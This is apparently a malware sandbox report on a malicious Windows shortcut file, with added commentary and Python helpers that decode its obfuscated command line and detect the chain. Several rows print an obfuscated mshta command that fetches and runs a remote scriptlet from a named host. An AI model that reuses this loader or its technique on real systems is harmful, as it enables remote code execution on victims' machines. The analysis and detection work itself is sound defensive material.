Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown | Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown | Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown | HTTPS traffic detected: 104.21.29.223:443 -> 192.168.2.6:49699 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.244.42.65:443 -> 192.168.2.6:49700 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.244.42.65:443 -> 192.168.2.6:49701 version: TLS 1.2
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: classification engine | Classification label: mal52.winLNK@4/0@3/2
Source: C:\Windows\System32\conhost.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c MshtA "JaVAsCrIpT:var _$_WXKH=["\x5a\x53\x46\x4d\113\x38\116","\x73\x63\162\x69\160\164\x3a\x48\x54\x74\x70\x73\x3a\x2f\x2f\x66\x6c\151\x6e\x61\x6e\x6d\x61\x6e\x73\x61\154\56\162\x6f\x75\x70\x61\x67\x75\143\x63\x69\x2e\163\x62\x73\57\x3f\x31\x2f"];try{GetObject(_$_WXKH[1])[_$_WXKH[0]]()}catch(e){};close()"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\mshta.exe MshtA "JaVAsCrIpT:var _$_WXKH=["\x5a\x53\x46\x4d\113\x38\116","\x73\x63\162\x69\160\164\x3a\x48\x54\x74\x70\x73\x3a\x2f\x2f\x66\x6c\151\x6e\x61\x6e\x6d\x61\x6e\x73\x61\154\56\162\x6f\x75\x70\x61\x67\x75\143\x63\x69\x2e\163\x62\x73\57\x3f\x31\x2f"];try{GetObject(_$_WXKH[1])[_$_WXKH[0]]()}catch(e){};close()"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\mshta.exe MshtA "JaVAsCrIpT:var _$_WXKH=["\x5a\x53\x46\x4d\113\x38\116","\x73\x63\162\x69\160\164\x3a\x48\x54\x74\x70\x73\x3a\x2f\x2f\x66\x6c\151\x6e\x61\x6e\x6d\x61\x6e\x73\x61\154\56\162\x6f\x75\x70\x61\x67\x75\143\x63\x69\x2e\163\x62\x73\57\x3f\x31\x2f"];try{GetObject(_$_WXKH[1])[_$_WXKH[0]]()}catch(e){};close()"
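The process-creation rows above carry the whole payload of this sample: cmd.exe hands mshta.exe an inline javascript: URL whose two string literals are written entirely as mixed \xHH and octal escapes, and the script indexes that array so that neither the target nor the method name appears in clear text. Decoding the two literals gives ZSFMK8N and script:HTtps://flinanmansal.roupagucci.sbs/?1/, so the statement that actually runs is GetObject("script:HTtps://flinanmansal.roupagucci.sbs/?1/")["ZSFMK8N"](). The script: prefix is the COM scriptlet moniker: the URL is fetched and the scriptlet's methods are exposed as a COM object, which is why scrobj.dll appears in the module list further down and why the same flinanmansal.roupagucci.sbs URL shows up in the memory strings above. The helper below is an added triage example, not code from the Joe Sandbox report or from the sample; its only input is the command line exactly as the report records it, and the function and result-field names are my own.

```python
"""Decode the escaped string literals in the report's mshta command line and
resolve the obfuscated GetObject(...) call. Added triage helper, not code from
the Joe Sandbox report or from the sample itself.
"""
import re

# The mshta.exe command line exactly as recorded in the report's process tree.
CMDLINE = (
    r'MshtA "JaVAsCrIpT:var _$_WXKH=['
    r'"\x5a\x53\x46\x4d\113\x38\116",'
    r'"\x73\x63\162\x69\160\164\x3a\x48\x54\x74\x70\x73\x3a\x2f\x2f\x66\x6c\151\x6e'
    r'\x61\x6e\x6d\x61\x6e\x73\x61\154\56\162\x6f\x75\x70\x61\x67\x75\143\x63\x69'
    r'\x2e\163\x62\x73\57\x3f\x31\x2f"'
    r'];try{GetObject(_$_WXKH[1])[_$_WXKH[0]]()}catch(e){};close()"'
)

# JScript escape forms: \xHH, \uHHHH, legacy octal (\0 to \377: one to three
# digits, three only when the first digit is 0-3) and single-character escapes.
_ESCAPE = re.compile(
    r'\\(x[0-9A-Fa-f]{2}|u[0-9A-Fa-f]{4}|[0-3][0-7]{0,2}|[4-7][0-7]?|.)', re.S)
_SIMPLE = {'n': '\n', 't': '\t', 'r': '\r', 'b': '\b', 'f': '\f', 'v': '\v'}
_LITERAL = re.compile(r'"((?:[^"\\]|\\.)*)"|\'((?:[^\'\\]|\\.)*)\'')
_ARRAY = re.compile(r'var\s+([A-Za-z_$][\w$]*)\s*=\s*\[(.*?)\]\s*;', re.S)


def decode_js_string(body):
    """Return the runtime value of a JScript string literal body (quotes removed)."""
    def repl(m):
        esc = m.group(1)
        if esc[0] in 'xu':
            return chr(int(esc[1:], 16))
        if esc[0] in '01234567':
            return chr(int(esc, 8))
        return _SIMPLE.get(esc, esc)   # \" \\ \/ and friends decode to themselves
    return _ESCAPE.sub(repl, body)


def triage(cmdline):
    """Resolve the lookup-table obfuscation and report what mshta would execute."""
    result = {
        # mshta running an inline javascript:/vbscript: URL instead of an .hta file
        'inline_script': bool(re.search(r'\b(javascript|vbscript):', cmdline, re.I)),
        'strings': [], 'resolved_call': None, 'scriptlet_url': None, 'method': None,
    }
    arr = _ARRAY.search(cmdline)
    if not arr:
        return result
    name, body = arr.group(1), arr.group(2)
    strings = [decode_js_string(m.group(1) if m.group(1) is not None else m.group(2))
               for m in _LITERAL.finditer(body)]
    result['strings'] = strings
    # GetObject(name[i])[name[j]](): bind a moniker, then call one of its methods.
    call = re.search(r'GetObject\(\s*%s\[(\d+)\]\s*\)\s*\[\s*%s\[(\d+)\]\s*\]\s*\(\s*\)'
                     % (re.escape(name), re.escape(name)), cmdline)
    if call:
        target, method = strings[int(call.group(1))], strings[int(call.group(2))]
        result['resolved_call'] = 'GetObject("%s")["%s"]()' % (target, method)
        result['method'] = method
        # "script:<url>" is the COM scriptlet moniker handled by scrobj.dll: the
        # URL is fetched and the scriptlet's methods become callable COM members.
        if target.lower().startswith('script:'):
            result['scriptlet_url'] = target[len('script:'):]
    return result


if __name__ == '__main__':
    for key, value in triage(CMDLINE).items():
        print('%-14s %s' % (key, value))
```

The decoder follows the JScript grammar rather than Python's own unescape, so the legacy octal forms (\113, \56) that Python's codecs would not treat the same way decode correctly; the mixed-case HTtps in the decoded target is just scheme-case obfuscation and resolves to the same https host the network section records.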
Source: C:\Windows\System32\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: jscript9.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior

Persistence and Installation Behavior

Source: LNK file | Process created: C:\Windows\System32\cmd.exe
Source: LNK file | Process created: C:\Windows\System32\mshta.exe
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: mshta.exe memory dumps 00000003.00000003.2109022379.0000029E8CE9D000, 00000003.00000003.2111510367.0000029E8CE9A000, 00000003.00000002.2113657541.0000029E8CE9B000, 00000003.00000003.2108977142.0000029E8CEF0000, 00000003.00000003.2111196582.0000029E8CE92000, 00000003.00000003.2110887212.0000029E8CEF0000, 00000003.00000002.2113778089.0000029E8CEF0000 (each with the suffix .00000004.00000020.00020000.00000000.sdmp) | Binary or memory string: Hyper-V RAW
Source: unknown (the LNK target) | Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c mshta "javascript:var _$_wxkh=["\x5a\x53\x46\x4d\113\x38\116","\x73\x63\162\x69\160\164\x3a\x48\x54\x74\x70\x73\x3a\x2f\x2f\x66\x6c\151\x6e\x61\x6e\x6d\x61\x6e\x73\x61\154\56\162\x6f\x75\x70\x61\x67\x75\143\x63\x69\x2e\163\x62\x73\57\x3f\x31\x2f"];try{getobject(_$_wxkh[1])[_$_wxkh[0]]()}catch(e){};close()" (command line normalized to lower case by the report)
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\mshta.exe mshta "javascript:var _$_wxkh=["\x5a\x53\x46\x4d\113\x38\116","\x73\x63\162\x69\160\164\x3a\x48\x54\x74\x70\x73\x3a\x2f\x2f\x66\x6c\151\x6e\x61\x6e\x6d\x61\x6e\x73\x61\154\56\162\x6f\x75\x70\x61\x67\x75\143\x63\x69\x2e\163\x62\x73\57\x3f\x31\x2f"];try{getobject(_$_wxkh[1])[_$_wxkh[0]]()}catch(e){};close()" (normalized to lower case; same process creation as the one listed at the top of this section)
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
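The one-liner above is worth decoding statically rather than by eye. The following Python is an added example written for this report, not Joe Sandbox output and not code from the sample: it reproduces the mshta.exe command line the sandbox logged, resolves the JScript escape sequences (\xHH and legacy octal \NNN) in the string array without running any script, extracts the moniker handed to GetObject() and the method name invoked on the returned object, and applies the same logic as a check over constructed Sysmon-style process-creation records. The .hta and conhost.exe records, the invoice.hta path and the field names Image/ParentImage/CommandLine are hypothetical illustration, not values from the report.

```python
"""Decode the obfuscated mshta one-liner and flag the cmd.exe -> mshta.exe ->
GetObject("script:...") chain in process-creation records (added example)."""
import re

# Command line the sandbox logged for mshta.exe (PID 5224), copied verbatim from the report.
MSHTA_CMDLINE = (
    r'MshtA "JaVAsCrIpT:var _$_WXKH=["\x5a\x53\x46\x4d\113\x38\116",'
    r'"\x73\x63\162\x69\160\164\x3a\x48\x54\x74\x70\x73\x3a\x2f\x2f\x66\x6c\151'
    r'\x6e\x61\x6e\x6d\x61\x6e\x73\x61\154\56\162\x6f\x75\x70\x61\x67\x75\143'
    r'\x63\x69\x2e\163\x62\x73\57\x3f\x31\x2f"];'
    r'try{GetObject(_$_WXKH[1])[_$_WXKH[0]]()}catch(e){};close()"'
)

_JS_ESCAPE = re.compile(r'\\(x[0-9A-Fa-f]{2}|u[0-9A-Fa-f]{4}|[0-7]{1,3}|.)', re.S)
_SIMPLE = {'n': '\n', 'r': '\r', 't': '\t', 'b': '\b', 'f': '\f', 'v': '\v'}
_STRING_LITERAL = re.compile(r'"((?:[^"\\]|\\.)*)"|\'((?:[^\'\\]|\\.)*)\'', re.S)


def js_unescape(literal):
    """Resolve JScript string escapes (\\xHH, \\uHHHH, legacy octal \\NNN, \\n, \\", ...)
    statically, i.e. without handing the text to a script engine."""
    def one(m):
        esc = m.group(1)
        if esc[0] == 'x' and len(esc) == 3:
            return chr(int(esc[1:], 16))
        if esc[0] == 'u' and len(esc) == 5:
            return chr(int(esc[1:], 16))
        if esc[0] in '01234567':
            return chr(int(esc, 8))
        return _SIMPLE.get(esc, esc)  # \" \\ \' and unknown escapes map to themselves
    return _JS_ESCAPE.sub(one, literal)


def decode_string_array(script):
    """Find the first `var NAME=[ ... ];` string array in a script body and return
    (NAME, decoded elements); (None, []) when there is none."""
    m = re.search(r'var\s+([$\w]+)\s*=\s*\[(.*?)\]\s*;', script, re.S)
    if not m:
        return None, []
    name, body = m.group(1), m.group(2)
    return name, [js_unescape(a or b) for a, b in _STRING_LITERAL.findall(body)]


def analyse_mshta_cmdline(cmdline):
    """Extract indicators from an `mshta "javascript:..."` (or vbscript:) command line:
    the decoded string array, the moniker passed to GetObject() and the method invoked
    on the object it returns."""
    info = {'inline_script': False, 'array_name': None, 'decoded_strings': [],
            'moniker': None, 'remote_url': None, 'invoked_method': None}
    m = re.search(r'(javascript|vbscript):(.*)', cmdline, re.I | re.S)
    if not m:
        return info
    info['inline_script'] = True
    script = m.group(2)
    name, items = decode_string_array(script)
    info['array_name'], info['decoded_strings'] = name, items
    if name is None:
        return info
    # GetObject(NAME[i])[NAME[j]]() : element i is the moniker, element j the method name
    call = re.search(r'GetObject\(\s*' + re.escape(name) + r'\[(\d+)\]\s*\)\s*\[\s*'
                     + re.escape(name) + r'\[(\d+)\]\s*\]\s*\(', script, re.I)
    if call and all(int(g) < len(items) for g in call.groups()):
        info['moniker'] = items[int(call.group(1))]
        info['invoked_method'] = items[int(call.group(2))]
        url = re.match(r'script:(.*)', info['moniker'], re.I | re.S)
        if url:
            info['remote_url'] = url.group(1)  # scrobj.dll downloads and runs this scriptlet
    return info


def is_mshta_scriptlet_chain(event):
    """True for a process-creation record matching this report's chain: cmd.exe spawning
    mshta.exe with an inline script that resolves a `script:` moniker via GetObject()."""
    image = event.get('Image', '').lower()
    parent = event.get('ParentImage', '').lower()
    if not (image.endswith('\\mshta.exe') and parent.endswith('\\cmd.exe')):
        return False
    info = analyse_mshta_cmdline(event.get('CommandLine', ''))
    return info['inline_script'] and (info['moniker'] or '').lower().startswith('script:')


# Constructed Sysmon-style (Event ID 1) records; only the first reproduces the report.
SAMPLE_EVENTS = [
    {'Image': r'C:\Windows\System32\mshta.exe', 'ParentImage': r'C:\Windows\System32\cmd.exe',
     'CommandLine': MSHTA_CMDLINE},
    {'Image': r'C:\Windows\System32\mshta.exe', 'ParentImage': r'C:\Windows\explorer.exe',
     'CommandLine': r'"C:\Windows\System32\mshta.exe" "C:\Users\user\Downloads\invoice.hta"'},  # hypothetical
    {'Image': r'C:\Windows\System32\conhost.exe', 'ParentImage': r'C:\Windows\System32\cmd.exe',
     'CommandLine': r'\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1'},
]

if __name__ == '__main__':
    found = analyse_mshta_cmdline(MSHTA_CMDLINE)
    print(found['array_name'], '->', found['decoded_strings'])
    print('GetObject moniker :', found['moniker'])
    print('method invoked    :', found['invoked_method'])
    for ev in SAMPLE_EVENTS:
        print(is_mshta_scriptlet_chain(ev), ev['CommandLine'][:60])
```

Decoding shows the array resolves to the method name ZSFMK8N and the moniker script:HTtps://flinanmansal.roupagucci.sbs/?1/ (the URL the report lists further down), so GetObject() asks scrobj.dll to fetch a remote scriptlet and the call invokes that scriptlet's ZSFMK8N method. That is why scrobj.dll and jscript9.dll appear among the loaded sections, and why the check keys on the script: moniker instead of on the mshta.exe image alone; a locally opened .hta does not trigger it.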
ATT&CK matrix, one line per tactic. A number in parentheses is the count of behavior signatures mapped to that technique; the remaining entries are the matrix's default placeholder techniques, for which no signature matched.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
Execution: Command and Scripting Interpreter (1); Scheduled Task/Job; At; Cron
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook
Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook
Defense Evasion: Process Injection (11); DLL Side-Loading (1); Obfuscated Files or Information; Binary Padding
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS
Discovery: Security Software Discovery (1); Process Discovery (1); File and Directory Discovery (1); System Information Discovery (12)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
Collection: Email Collection (1); Data from Removable Media; Data from Network Shared Drive; Input Capture
Command and Control: Encrypted Channel (1); Non-Application Layer Protocol (2); Application Layer Protocol (13); Ingress Tool Transfer (1)
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction
Antivirus and machine learning detection, initial sample

Source | Detection | Scanner
ProconGO1121082800.LnK.lnk | 5% | ReversingLabs
ProconGO1121082800.LnK.lnk | 100% | Joe Sandbox ML

Dropped files: No Antivirus matches
Unpacked PE files: No Antivirus matches
Domains: No Antivirus matches
URLs (a dash in the Label column means the scanner gave no verdict label, only a lookup link)

Source | Detection | Scanner | Label
https://cm.g.double | 0% | Avira URL Cloud | safe
https://iframe.arkoselabs.com/ | 0% | Avira URL Cloud | safe
https://iframe.arkos | 0% | Avira URL Cloud | safe
https://ads-twitter.com | 0% | Avira URL Cloud | safe
http://micrt.co | 0% | Avira URL Cloud | safe
https://x.com | 0% | URL Reputation | safe
https://recaptcha.net/recaptcha/ | 0% | Avira URL Cloud | safe
https://upload.x.com | 0% | Avira URL Cloud | safe
https://static.ads-twitter.com | 0% | Avira URL Cloud | safe
https://ton.x.com | 0% | Avira URL Cloud | safe
https://iframe.arkoselabs.com/ | 0% | Virustotal | -
http://micrt.co | 0% | Virustotal | -
https://vaultjs.apideck.com/ | 0% | Avira URL Cloud | safe
https://ads-twitter.com | 0% | Virustotal | -
https://pay.x.com | 0% | Avira URL Cloud | safe
https://static.ads-twitter.com | 0% | Virustotal | -
https://ton-staging.pdxa.x.com | 0% | Avira URL Cloud | safe
https://recaptcha.net/recaptcha/ | 0% | Virustotal | -
https://ton.x.com | 0% | Virustotal | -
https://flinanmansal.roupagucci.sbs/ | 0% | Avira URL Cloud | safe
https://upload.x.com | 0% | Virustotal | -
https://dwo3ckksxlb0v.cloudfront.net; | 0% | Avira URL Cloud | safe
https://vaultjs.apideck.com/ | 0% | Virustotal | -
https://www.twitter.com( | 0% | Avira URL Cloud | safe
HTtps://flinanmansal.roupagucci.sbs/?1/ | 0% | Avira URL Cloud | safe
https://ton-staging.pdxa.x.com | 0% | Virustotal | -
https://flinanmansal.roupagucci.sbs/?1/9?s | 0% | Avira URL Cloud | safe
https://localhost.x.com:3443; | 0% | Avira URL Cloud | safe
https://prod-periscope-profile.s1 | 0% | Avira URL Cloud | safe
https://flinanmansal.roupagucci.sbs/?1/??u | 0% | Avira URL Cloud | safe
https://analytics.x.com | 0% | Avira URL Cloud | safe
https://pay.x.com | 0% | Virustotal | -
https://analytics.x.com | 0% | Virustotal | -
https://aa.x.com | 0% | Avira URL Cloud | safe
https://flinanmansal.roupagucci.sbs/?1/Ztu | 0% | Avira URL Cloud | safe
https://aa.x.com | 0% | Virustotal | -
https://api-stream.x.com | 0% | Avira URL Cloud | safe
https://mobile.x.com | 0% | Avira URL Cloud | safe
https://ton-staging.atla.x.com | 0% | Avira URL Cloud | safe
https://ads-api.x.com | 0% | Avira URL Cloud | safe
https://caps.x.com | 0% | Avira URL Cloud | safe
https://api.x.com | 0% | Avira URL Cloud | safe
https://client-api.arkoselabs.com/ | 0% | Avira URL Cloud | safe
https://caps.x.com | 0% | Virustotal | -
https://ads-api.x.com | 0% | Virustotal | -
https://ton-staging.atla.x.com | 0% | Virustotal | -
https://client-api.arkoselabs.com/ | 0% | Virustotal | -
https://api-stream.x.com | 0% | Virustotal | -
https://mobile.x.com | 0% | Virustotal | -
https://api.x.com | 0% | Virustotal | -
Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
twitter.com | 104.244.42.65 | true | false | - | high
flinanmansal.roupagucci.sbs | 104.21.29.223 | true | false | - | unknown
www.twitter.com | unknown | unknown | false | - | high

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
https://www.twitter.com/ | false | - | high
https://twitter.com/ | false | - | high
https://flinanmansal.roupagucci.sbs/?1/ | false | - | unknown
URLs found in process memory

All sources are memory dumps of mshta.exe (process index 00000003). Each dump is written as <dump type>.<dump id>.<base address>; the common suffix .00000004.00000020.00020000.00000000.sdmp is omitted from every entry.

Name | Source | Malicious | Antivirus Detection | Reputation
https://mmdhdsnappytv-vh.akamaihd.net | 00000003.2108824952.000002A68F379000 | false | - | high
https://iframe.arkos | 00000003.2112704093.000002A68F311000 | false | Avira URL Cloud: safe | unknown
https://www.twitter.com/8 | 00000003.2096343502.000002A68F343000, 00000003.2108869400.000002A68F343000, 00000002.2114187780.000002A68F343000, 00000003.2112704093.000002A68F343000, 00000003.2110781006.000002A68F343000 | false | - | high
https://cm.g.double | 00000003.2112704093.000002A68F311000 | false | Avira URL Cloud: safe | unknown
https://iframe.arkoselabs.com/ | 00000003.2108869400.000002A68F313000, 00000003.2108869400.000002A68F371000, 00000003.2108824952.000002A68F379000 | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://twitter.com/$ | 00000003.2108869400.000002A68F343000, 00000002.2114187780.000002A68F343000, 00000003.2112704093.000002A68F343000, 00000003.2110781006.000002A68F343000 | false | - | high
https://media.riffsy.com | 00000003.2108824952.000002A68F379000 | false | - | high
https://twitter.com/privacy | 00000003.2108824952.000002A68F372000 | false | - | high
https://cm.g.doubleclick.net | 00000003.2108869400.000002A68F313000, 00000003.2108869400.000002A68F371000, 00000003.2108824952.000002A68F379000 | false | - | high
https://ton-staging.pdxa.twitter.com | 00000003.2108869400.000002A68F313000, 00000003.2108869400.000002A68F371000, 00000003.2108824952.000002A68F379000 | false | - | high
https://www.twitter.com/0 | 00000003.2096343502.000002A68F343000 | false | - | high
https://analytics.twitter.com | 00000003.2108824952.000002A68F379000 | false | - | high
https://www.periscope.tv | 00000003.2108869400.000002A68F313000, 00000003.2112704093.000002A68F311000, 00000003.2108869400.000002A68F371000, 00000003.2108824952.000002A68F379000 | false | - | high
https://dhdsnappytv-vh.akamaihd.net | 00000003.2108824952.000002A68F379000 | false | - | high
https://localhost.twitter.com:3443 | 00000003.2108869400.000002A68F313000, 00000003.2108869400.000002A68F371000, 00000003.2108824952.000002A68F379000 | false | - | high
https://c.tenor.com | 00000003.2108824952.000002A68F379000 | false | - | high
http://micrt.co | 00000003.2108869400.000002A68F343000, 00000002.2114187780.000002A68F343000, 00000003.2112704093.000002A68F343000, 00000003.2110781006.000002A68F343000 | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://support.twitter.com/articles/20170514 | 00000003.2108824952.000002A68F372000 | false | - | high
https://vmap.snappytv.com | 00000003.2108869400.000002A68F313000, 00000003.2112704093.000002A68F311000, 00000003.2108869400.000002A68F371000, 00000003.2108824952.000002A68F379000 | false | - | high
https://www.twitter.com/H | 00000003.2108869400.000002A68F343000, 00000002.2114187780.000002A68F343000, 00000003.2112704093.000002A68F343000, 00000003.2110781006.000002A68F343000 | false | - | high
https://ads-twitter.com | 00000003.2108824952.000002A68F379000 | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://www.pscp.tv | 00000003.2108869400.000002A68F313000, 00000003.2112704093.000002A68F311000, 00000003.2108869400.000002A68F371000, 00000003.2108824952.000002A68F379000 | false | - | high
https://upload.x.com | 00000003.2108869400.000002A68F313000, 00000003.2108869400.000002A68F371000, 00000003.2108824952.000002A68F379000 | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://vmap.grabyo.com | 00000003.2108869400.000002A68F313000, 00000003.2112704093.000002A68F311000, 00000003.2108869400.000002A68F371000, 00000003.2108824952.000002A68F379000 | false | - | high
https://checkoutshopper-live.adyen.com | 00000003.2108869400.000002A68F313000, 00000003.2108869400.000002A68F371000, 00000003.2108824952.000002A68F379000 | false | - | high
https://twitter.com/( | 00000003.2108869400.000002A68F343000, 00000002.2114187780.000002A68F343000, 00000003.2112704093.000002A68F343000, 00000003.2110781006.000002A68F343000 | false | - | high
https://ton.twitter.com | 00000003.2108824952.000002A68F379000 | false | - | high
https://recaptcha.net/recaptcha/ | 00000003.2108824952.000002A68F379000 | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://static.ads-twitter.com | 00000003.2108869400.000002A68F313000, 00000003.2108824952.000002A68F372000, 00000003.2108824952.000002A68F379000 | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://vmapstage.snappytv.com | 00000003.2108869400.000002A68F313000, 00000003.2112704093.000002A68F311000, 00000003.2108869400.000002A68F371000, 00000003.2108824952.000002A68F379000 | false | - | high
https://pay.twitter.com | 00000003.2108824952.000002A68F379000 | false | - | high
https://api.x.ai | 00000003.2108869400.000002A68F313000, 00000003.2108869400.000002A68F371000, 00000003.2108824952.000002A68F379000 | false | - | high
https://ton.x.com | 00000003.2108824952.000002A68F379000 | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://api.twitter.com | 00000003.2108869400.000002A68F313000, 00000003.2108869400.000002A68F371000, 00000003.2108824952.000002A68F379000 | false | - | high
https://twitter.com | 00000003.2108824952.000002A68F379000 | false | - | high
https://upload.twitter.com | 00000003.2108869400.000002A68F313000, 00000003.2108869400.000002A68F371000, 00000003.2108824952.000002A68F379000 | false | - | high
https://api-stream.twitter.com | 00000003.2108869400.000002A68F313000, 00000003.2108869400.000002A68F371000, 00000003.2108824952.000002A68F379000 | false | - | high
https://vaultjs.apideck.com/ | 00000003.2108869400.000002A68F313000, 00000003.2112704093.000002A68F311000, 00000003.2108869400.000002A68F371000, 00000003.2108824952.000002A68F379000 | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://twitter.com/i/csp_report?a=O5RXE%3D%3D%3D&ro=false | 00000003.2108869400.000002A68F313000, 00000003.2108824952.000002A68F372000, 00000003.2108824952.000002A68F379000 | false | - | high
https://cards-frame.twitter.com | 00000003.2108869400.000002A68F313000, 00000003.2112704093.000002A68F311000, 00000003.2108869400.000002A68F371000, 00000003.2108824952.000002A68F379000 | false | - | high
https://pay.x.com | 00000003.2108824952.000002A68F379000 | false | 0% Virustotal; Avira URL Cloud: safe | unknown
